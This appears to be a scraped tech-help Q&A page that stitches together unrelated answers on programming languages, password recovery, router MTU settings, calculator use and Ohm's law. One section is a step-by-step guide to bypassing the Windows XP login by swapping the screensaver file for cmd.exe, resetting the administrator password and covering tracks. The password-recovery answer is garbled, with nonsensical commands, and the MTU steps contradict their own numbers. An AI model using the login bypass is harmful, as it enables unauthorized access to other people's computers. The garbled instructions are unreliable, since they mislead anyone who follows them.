There are several progrmming languages that let you write command-line or "console" programs.
Visual Basic: easy to learn for a begginer.
C#: more powerful and scalable.
perl: runs everywhere, Windows, Linux, Mac.

You can download VB 2008 and C# from the microsoft website for free. Either of those will get you started.

My password and username

Now what sort of a problem with a user name and password
IE: Log on to a computer ,internet , email or another computer program >???
Almost everything on a computer or on the Internet requires passwords.
If you are like most people, between home, school, work and your social networking, you have a host of passwords.
So what happens when you cannot remember your most basic passwords, such as your Windows password?
There are programs that can find passwords for you, but there is a way to find them without a program or software.

Open your computer's Start option.
Click on Accessories panel. Under this, you will see the program "Run," and click on it.
You will have a black window with a typing bar that is displayed DOS Mode.
Write down your passwords for future reference.
Type in "cmd" in the blank, then press the Enter button.
You should then be given a screen that looks like the old Disc Operating Screens, just a blank screen with information.
You will see the words "Account information."
Type "netuser/user" and press "Enter."
Computer passwords are a key to our computer and online privacy.
Look at the list of all your computer's programs that appear on your screen.
Pick the program that you wish to change the password for, and after that program name type in "netusername", hit space and and click "star" key.
So if you're Bob, it would read "netuserbob *".
Be sure and put in the name you use for the specific computer you are changing passwords on.
You can then create a new password that will allow you to get back into the program.
If you have forgotten more than one password, you can repeat the process for other programs.
Do not exit the black screen but simply go back to the other program's names and repeat the same process with "netusername *",
Enter, and new password.

Hack windows

Here are the steps involved to <b>Hack</b> the <b>Window XP Administrator Password</b> .<br /> <ol> <li>Go to <b>Start</b> -&gt; <b>Run</b> -&gt; Type in <b>CMD</b></li> <li>You will get a command prompt. Enter these commands the way it is given</li> <li>cd\</li> <li>cd\ windows\system32</li> <li>mkdir temphack</li> <li>copy logon.scr temphack\logon.scr</li> <li>copy cmd.exe temphack\cmd.exe</li> <li>del logon.scr</li> <li>rename cmd.exe logon.scr</li> <li>exit</li></ol> Wait its not over read the rest to find out how to <b>Hack</b> the <b>Window XP Administrator Password</b><br /> A Brief explanation of what you are currently doing here is<br /> Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called <b>mkdir. </b>After which you are copying or backing up the <b>logon.scr</b> and<b> cmd.exe</b> files into the <b>mkdir</b> then you are deleting the <b>logon.scr</b> file and renaming <b>cmd.exe</b> file to <b>logon.scr</b>.<br /> So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an <b>unprotected dos prompt without logging in</b>. When this appears enter this command<br /> <b>net user password</b><br /> Example: If the admin user name is clazh and you want change the password to pass Then type in the following command<br /> <b>net user clazh pass</b><br /> This will chang the admin password to pass.<br /> Thats it you have sucessfully <b>hacked</b> the <b>Window XP Administrator Password</b> now you can Log in, using the <b>hacked</b> <b>Window XP Administrator Password</b> and do whatever you want to do.<br /> Here are the steps involved to De <b>Hack</b> or restore the <b>Window XP Administrator Password </b>to cover your tracks.<br /> <ol> <li>Go to <b>Start</b> -&gt; <b>Run</b> -&gt; Type in <b>CMD</b></li> <li>You will get a command prompt. Enter these commands the way it is given</li> <li>cd\</li> <li>cd\ windows\system32\temphack</li> <li>copy logon.scr C:\windows\system32\logon.scr</li> <li>copy cmd.exe C:\windows\system32\cmd.exe</li> <li>exit</li></ol> Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click <b>Yes </b>to overwrite the modified files.<br />

CAN SEND BUT CANNOT RECEIVE EMAIL

Verify if you are connected to the router you were able to receive an email. If even directly connected to the router you are not able to receive an email you may try to by pass the router and connect the computer to the modem and check if you can receive an email. If only through the router you are having problem with you may try the following steps to troubleshoot the problem:

a.Check your e-mail program settings the correct incoming server address, also known as the POP Server if you use a POP3 e-mail server. This address must be what your Internet Service Provider assigns for e-mail communication. If unsure of the setting, please contact your Internet Service Provider.
b.This is sometimes due to your ISPs MTU (Maximum Transmission Unit)being lower than what the router is set to. To adjust this correctly, follow the steps below:

To find the proper MTU Size, you’ll have to do a special ping of the destination you’re trying to go to. A destination could be another computer, or a URL.

1.Click on the Start button, select the Run option.
2.In the “Open” field type in command (If you’re using Windows2K/NT/XP use CMD instead).
3.Once the window opens, you’ll need to do a special ping. It should be formatted:
ping[url] [-f] [-l] [MTU value] [Enter] an example would be:
pingyahoo.com –f –l 1472 <result = fragmented packet>
pingyahoo.com –f –l 1462 <result = fragmented packet>
pingyahoo.com –f –l 1452 <result = reply>

You should always start at 1472 and work your way down by 10 each time. Once you get a reply, go up by 2 until you get a fragmented packet. Take that value and add 28 to the value to account for the various TCP/IP headers. For example, let’s say that 1452 was the proper value, the actual MTU size would be 1480, which is the optimum for the network we’re working with.

4.Once you’ve found the optimum MTU size open up your browser, usually Internet Explorer, which is located on your desktop (Or on the Start menu in Windows XP).
5.Once Internet Explorer has opened inputhttp://192.168.1.1/Filters.htm into the “Address” bar.
6.You will be prompted for a User Name and Password. Leave the User Name blank and input admin as the password then click OK.
7.Under the Set up tab set the MTU to manual and input the optimum value you got earlier. So for our example this would be 1400. Hit the Save settings button then you are done.

Hope this help everyone.

I need to solve this problem, can anyone help? 2.5/7 = x/10 How do I get this calculator to do it?

It looks like overkill to use the calculator to solve this first order linear equation but I will show you how to use the Solve function available on this calculator.

First solution: Pen and paper.

Use the properties of proportions:
Let a, b, c, and d numbers, with b, and d not equal to 0
if a/b=c/d then a*d=b*c
To apply it to your case, you set a=2.5, b=7, c=x, and d=10.
This gives 2.5*10=7*x
Dividing both members of the equation by 7 yields x=25/7.

Using the SOLVE program
  1. Calculator should be in computational mode: Press [MODE][1:COMP]
  2. Type in the equation in the way described below:
  3. You will need to use the key sequence [ALPHA][CALC] (=) to insert the = sign, the one at the top left, not the one at the bottom right.
  4. You will need to use the sequence [SHIFT][CALC] (SOLVE) to order the calculator to start solving your equation.
  5. You will need the key sequence [ALPHA] [)] to insert the X variable.
  6. Now that you have been alerted to the sequaences you will need, here is how to enter your equation.
  7. 2.5/7 [ALPHA][CALC] (=) [ALPHA] [ ) ] (X) /10
  8. While the above sequence is in the command line with the cursor still blinking to the right of the 0, press [SHIFT][CALC] to access the (SOLVE) command.
  9. The calculator displays in the top line of the dispaly "Solve for X". At the bottom there would be some old (irrelevant value).
  10. At this point you are expected to enter a value for your initial guess.
  11. You can for example enter 2 and press [=] at the bottom right. If you do not type a guess, the calculator uses the old (irrelevant) value as initial guess.
  12. So you enter initial guess 2 and press the [=/EXE] key at the bottom.
  13. After a while (could be short , if the initial guess is inspired) the calculator returns with the solution.
  14. The solution display screen recalls your equation on the top line,
  15. X=3.571428571 on the middle line, and
  16. L-R= 0 on the bottom line.
The L-R=0, tells you that the difference between the LEFT side and the RIGHT side of your equation is 0. That means the X given in the second line is the solution within the tolerance of the calculator.

If you are not happy with the solution (L-R different from 0), or the calculator failed to return a solution, you can press [SHIFT][CALC] (SOLVE) to restart with a better guess.

Given a current of 10amps and a resistance of 500ohms what is the voltage plz could u help me on this

Ohms law can be applied here . When applying Ohms circuits are taken as perfect with no additional deviations to values introduced by connections or temperature, so although not exactly correct it is a very good guide. Almost all electical calcs can be done with Ohms law and its variations.

so
V(volts) = I(current) x R (resistance)

I x R =5000
so V =5000

Answer is 5000 Volts
